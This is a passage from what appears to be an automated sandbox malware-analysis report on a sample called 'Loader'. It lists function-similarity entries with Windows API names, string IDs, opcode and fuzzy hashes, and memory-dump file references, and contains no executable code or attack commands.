                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2933794660-0
                                                                                                                • Opcode ID: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
                                                                                                                • Instruction ID: f33570a07a3acbabb6eb70d5581a6b9067d868c49435c9d1e475b56a06e03d0d
                                                                                                                • Opcode Fuzzy Hash: 41310779a6c5ecc8dc55aeaa54b0bfbfcdf6f0d630f502492cdebec27cc5a48f
                                                                                                                • Instruction Fuzzy Hash: 79F06274D1024DEBCB00EBB4DA89A9EBBF8FF1C244B9159A5A412EB150E730AB449F51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CDA1E5
                                                                                                                • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?), ref: 00CDA21C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CodePageValid
                                                                                                                • String ID: utf8
                                                                                                                • API String ID: 943130320-905460609
                                                                                                                • Opcode ID: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
                                                                                                                • Instruction ID: 69bcb6ecc8bc961f5dda2b8cd72b25758425dedc841c6775f251907defd2903f
                                                                                                                • Opcode Fuzzy Hash: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
                                                                                                                • Instruction Fuzzy Hash: 5E51D471600705BADB25AB71CC42BBA73A9EF44700F14042BFB599B391EB70EE4096A7
                                                                                                                APIs
                                                                                                                • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CD5071,?,?,00000000,00000000,00000000,?), ref: 00CD5195
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID: MOC$RCC
                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                • Opcode ID: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
                                                                                                                • Instruction ID: d3be2a93a58237ddd89be69764adb2e7e60903885c7640748034030d17a2f5af
                                                                                                                • Opcode Fuzzy Hash: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
                                                                                                                • Instruction Fuzzy Hash: 06418972900609AFCF15CF98CD81AEEBBB5FF08304F18805AFA24A7311D335AA50DB51
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearInit
                                                                                                                • String ID: <
                                                                                                                • API String ID: 2610073882-4251816714
                                                                                                                • Opcode ID: bad2be2dcfe1c31b12466c129fa1573cb1ba6cf6e70ac72a3dd25af1e62a9899
                                                                                                                • Instruction ID: 36de878388d46f0b64cd47425884e603f8c16ae8beab8166c1c18797f8568c08
                                                                                                                • Opcode Fuzzy Hash: bad2be2dcfe1c31b12466c129fa1573cb1ba6cf6e70ac72a3dd25af1e62a9899
                                                                                                                • Instruction Fuzzy Hash: D7414D21108BC18FD335CF3C8898647BFE06B16214F484FADD0E64B7D6D364A20AC796
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                • Opcode ID: 8ac0c0dd36d85f38f7ff20037301531bac82221c30a33fa984e21204b95f3e2f
                                                                                                                • Instruction ID: f9e283a9bed4f101d53c19740253f78c7c5a39bcd22ec5d74df376b4fb69552d
                                                                                                                • Opcode Fuzzy Hash: 8ac0c0dd36d85f38f7ff20037301531bac82221c30a33fa984e21204b95f3e2f
                                                                                                                • Instruction Fuzzy Hash: 5931A1B49143148FDB00EF78DA8560EBBF4BB89304F51452EE898DB360D3B4A948CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc
                                                                                                                • String ID: @$VirtualProtect
                                                                                                                • API String ID: 190572456-29487290
                                                                                                                • Opcode ID: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
                                                                                                                • Instruction ID: ac1913e113e58ebd1cd30228865e810d141904fd9748f2118573445a7401eebe
                                                                                                                • Opcode Fuzzy Hash: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
                                                                                                                • Instruction Fuzzy Hash: 7341D0B0900208DFCB04DFA9D998B9EBBF0FF08344F118459E858AB341D775A944CF82